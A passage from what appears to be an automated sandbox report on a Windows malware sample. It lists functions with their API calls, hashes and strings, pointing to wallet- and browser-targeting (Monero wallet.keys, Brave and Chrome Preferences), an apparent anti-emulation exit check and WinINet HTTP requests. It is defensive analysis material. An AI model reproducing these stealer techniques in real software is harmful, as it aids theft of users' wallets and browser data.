                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 536ab6e97ab0e76f924b74296eeefc22be9eeb87170f269aa1b11575ebade4a9
                          • Instruction ID: 631b0a996b5146c00c6710e55822ced2554a5c4496a53e11df0f35cd8c33e9f7
                          • Opcode Fuzzy Hash: 536ab6e97ab0e76f924b74296eeefc22be9eeb87170f269aa1b11575ebade4a9
                          • Instruction Fuzzy Hash: 1C211DB1D00209ABDF14DFA4E845ADE7B79FF45320F108625F929A72D0EB706A09CF91
                          Function 001751F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 00166280: InternetOpenA.WININET(00180DFE,00000001,00000000,00000000,00000000), ref: 001662E1
                            • Part of subcall function 00166280: StrCmpCA.SHLWAPI(?,00CCFC38), ref: 00166303
                            • Part of subcall function 00166280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00166335
                            • Part of subcall function 00166280: HttpOpenRequestA.WININET(00000000,GET,?,00CCF4B8,00000000,00000000,00400100,00000000), ref: 00166385
                            • Part of subcall function 00166280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001663BF
                            • Part of subcall function 00166280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001663D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00175228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: f6e486dd62dc199252dfd92f46fc8372e0d875807b133804919cf52805abb2ef
                          • Instruction ID: be6aa8e56cf84590dd0055bbd0dadad05247c9768142faf05d9a002b14d36b1c
                          • Opcode Fuzzy Hash: f6e486dd62dc199252dfd92f46fc8372e0d875807b133804919cf52805abb2ef
                          • Instruction Fuzzy Hash: 8211EF31910148A7CB18FF64DD52AED7739AFA0300F808168F81E5B592EF756B16CB92
                          Function 0054543B Relevance: 4.6, APIs: 3, Instructions: 77registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 005473D3
                          • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 005473FA
                          • GetNativeSystemInfo.KERNEL32(?), ref: 00547451
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Open$InfoNativeSystem
                          • String ID:
                          • API String ID: 1247124224-0
                          • Opcode ID: 606afdca8a0aa4d289dfc01fff92c314c0cc53e7dc7ee0f73291ca08e3b41813
                          • Instruction ID: b774f0d1999e26a782358b48c756310f5e25e80d95589e1dd6b158287d0223af
                          • Opcode Fuzzy Hash: 606afdca8a0aa4d289dfc01fff92c314c0cc53e7dc7ee0f73291ca08e3b41813
                          • Instruction Fuzzy Hash: E531167100820E9FEF20DF60D948BEE3BA9FB05315F100926AD8186D41E7B65CA4DF59
                          Function 001778E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00177910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00177917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 0017792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: cab35f0c2b354c3c0322440239e50427bdd53d0743d523c54e2b426488d3e967
                          • Instruction ID: 720ffcd4807a07378f3c87fa0d685e688dc0cd88e20f39521ebdb6ef751d3066
                          • Opcode Fuzzy Hash: cab35f0c2b354c3c0322440239e50427bdd53d0743d523c54e2b426488d3e967
                          • Instruction Fuzzy Hash: AA0186B1904609EBC704DF94DD45BAABBBCFB05B25F104219F645E3280C3785904CBA2
                          Function 00161110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0016112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00161132
                          • ExitProcess.KERNEL32 ref: 00161143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 4067759a4de749e34bd6e6673544d79c9be812e62501996fd3297c4353047251
                          • Instruction ID: b0fffe7cd136a9b23de6f09a0ba4fc1974896a2c069e0ddebd2a530b5ec9e09a
                          • Opcode Fuzzy Hash: 4067759a4de749e34bd6e6673544d79c9be812e62501996fd3297c4353047251
                          • Instruction Fuzzy Hash: CDE0E671985308FFE7516BA09D0AB1D7A7CAB05B01F104154F709B61D0D7B52A50D699
                          Function 001610A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001610B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001610F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 38f9a023ee89056a16b9c9f9d12e6c38e5e11a8942eceb541dbe6a692db06a13
                          • Instruction ID: 910025d86fc9123abde8277d82b53aba7fa40563b9329931f61afd24b48371d1
                          • Opcode Fuzzy Hash: 38f9a023ee89056a16b9c9f9d12e6c38e5e11a8942eceb541dbe6a692db06a13
                          • Instruction Fuzzy Hash: 1FF0E971641304BBEB1496A49C49FBBB7ECD705715F300444F504E3280D6715E00CA50
                          Function 00161190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 001778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00177910
                            • Part of subcall function 001778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00177917
                            • Part of subcall function 001778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0017792F
                            • Part of subcall function 00177850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001611B7), ref: 00177880
                            • Part of subcall function 00177850: RtlAllocateHeap.NTDLL(00000000), ref: 00177887
                            • Part of subcall function 00177850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0017789F
                          • ExitProcess.KERNEL32 ref: 001611C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: 7840af96bee8301ae6bf9ea0cc16a5597b718194df7913dec2cbbfb6227ca567
                          • Instruction ID: 2a7757641742068cfdb339a180c318dde06f02c3af95ea125143a70571a28531
                          • Opcode Fuzzy Hash: 7840af96bee8301ae6bf9ea0cc16a5597b718194df7913dec2cbbfb6227ca567
                          • Instruction Fuzzy Hash: 07E012B695430163CB0177B1AC0AB2A32AC5B26345F084824FA0DD3552FB69E810C66A

                          Non-executed Functions

                          Function 001738B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 001738CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 001738E3
                          • lstrcat.KERNEL32(?,?), ref: 00173935
                          • StrCmpCA.SHLWAPI(?,00180F70), ref: 00173947
                          • StrCmpCA.SHLWAPI(?,00180F74), ref: 0017395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00173C67
                          • FindClose.KERNEL32(000000FF), ref: 00173C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 302095cf5d7d71358d32f7e62750fb4a701abfb942a83b5de906e782ce0a9952
                          • Instruction ID: 94c8e6786789efb35e89f4a3217f51b402b3d82f5b4f39f71236d029d1266a5c
                          • Opcode Fuzzy Hash: 302095cf5d7d71358d32f7e62750fb4a701abfb942a83b5de906e782ce0a9952
                          • Instruction Fuzzy Hash: 9AA172B2900218ABDB65DFA4CC85FEE737CBF99300F048588A61D96141EB759B84CF62
                          Function 0016BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • FindFirstFileA.KERNEL32(00000000,?,00180B32,00180B2B,00000000,?,?,?,001813F4,00180B2A), ref: 0016BEF5
                          • StrCmpCA.SHLWAPI(?,001813F8), ref: 0016BF4D
                          • StrCmpCA.SHLWAPI(?,001813FC), ref: 0016BF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0016C7BF
                          • FindClose.KERNEL32(000000FF), ref: 0016C7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: 4aa0f4a9e3d01d210777d8ea1a939e98a7ffda6a620fd36f3e8cdd5ba7d9ce76
                          • Instruction ID: 78ae578aac134f62b97b8473275f396d0e35be09dcbca385f6e8d1f619271d76
                          • Opcode Fuzzy Hash: 4aa0f4a9e3d01d210777d8ea1a939e98a7ffda6a620fd36f3e8cdd5ba7d9ce76
                          • Instruction Fuzzy Hash: 06424672910104A7CB18FBB4DD96EEE737DAFA4300F808558B90E97191EF349B59CB92
                          Function 00174910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0017492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00174943
                          • StrCmpCA.SHLWAPI(?,00180FDC), ref: 00174971
                          • StrCmpCA.SHLWAPI(?,00180FE0), ref: 00174987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00174B7D
                          • FindClose.KERNEL32(000000FF), ref: 00174B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: fff5c2a10aacade98b93d61dfb51cbb01942dfcd813e975d413ab48051aab9d7
                          • Instruction ID: 91fa0a5887ba407fb3517560a2502b5a63d9dfe65a99e67cfd6134acda4e6010
                          • Opcode Fuzzy Hash: fff5c2a10aacade98b93d61dfb51cbb01942dfcd813e975d413ab48051aab9d7
                          • Instruction Fuzzy Hash: 0D6186B2900618ABCB65EBA0DC45EEE737CBF59701F048588F60D96040EB75EB89CF91
                          Function 00174570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00174580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00174587
                          • wsprintfA.USER32 ref: 001745A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 001745BD
                          • StrCmpCA.SHLWAPI(?,00180FC4), ref: 001745EB
                          • StrCmpCA.SHLWAPI(?,00180FC8), ref: 00174601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0017468B
                          • FindClose.KERNEL32(000000FF), ref: 001746A0
                          • lstrcat.KERNEL32(?,00CCFAF8), ref: 001746C5
                          • lstrcat.KERNEL32(?,00CCE118), ref: 001746D8
                          • lstrlen.KERNEL32(?), ref: 001746E5
                          • lstrlen.KERNEL32(?), ref: 001746F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
